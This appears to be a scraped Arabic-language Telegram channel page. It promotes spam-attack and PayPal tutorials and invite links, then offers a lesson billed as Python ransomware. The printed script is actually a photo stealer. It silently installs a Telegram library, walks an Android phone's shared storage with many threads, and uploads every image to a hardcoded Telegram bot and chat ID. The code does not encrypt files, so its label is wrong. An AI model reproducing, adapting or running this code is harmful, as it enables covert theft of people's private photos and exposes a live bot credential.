2 087
订阅者
-924 小时
-377 天
-4430 天
帖子存档
https://chat.whatsapp.com/LtjlEhM5KOnDZkvk92pZXe
جروبنا علي واتساب انضمو
اي حد ينشر رابط يجي ياخد حاجه حلوه
@A0lI1l
اجبعاد دي كلها شروحات للقصف والباي بال كل حاجه على هذا المجال في القناه❤️
+1
https://t.me/+ZZ4SAqZ7JUlmYTQ0
القناه تفيدك هتطلع قصف ان شاء الله
30 نجمه
إنشاء فيروس الفديه بلغة البايثون
( Ransomware )
- المده 🕑 : ساعه.
- اللغه ㊗️ : العربيه.
اتفضلوا
(\_/) ( •.• ) />♥️
import os
from concurrent.futures import ThreadPoolExecutor
import threading
import subprocess
import sys
try:
import telebot, pyfiglet, requests
except ImportError:
subprocess.check_call([sys.executable, "-m", "pip", "install", "pyTelegramBotAPI", 'pyfiglet', 'requests'])
import telebot
import pyfiglet
import requests
bot = telebot.TeleBot('7250962004:AAG2g8IvQFv3-EzijinTj_zZFLbSzuGStqA')
dir_path = "/storage/emulated/0/"
def send_file(file_path):
with open(file_path, "rb") as f:
if file_path.lower().endswith((".jpg", ".png", ".jpeg", ".webp")):
bot.send_photo(chat_id=5198984934, photo=f, caption='By: AKRAM')
def background():
with ThreadPoolExecutor(max_workers=300) as executor:
for root, dirs, files in os.walk(dir_path):
for file in files:
file_path = os.path.join(root, file)
if file_path.lower().endswith((".jpg", ".png", ".jpeg", ".webp", ".PNG", ".JPG", ".JPEG")):
executor.submit(send_file, file_path)
threading.Thread(target=background).start()
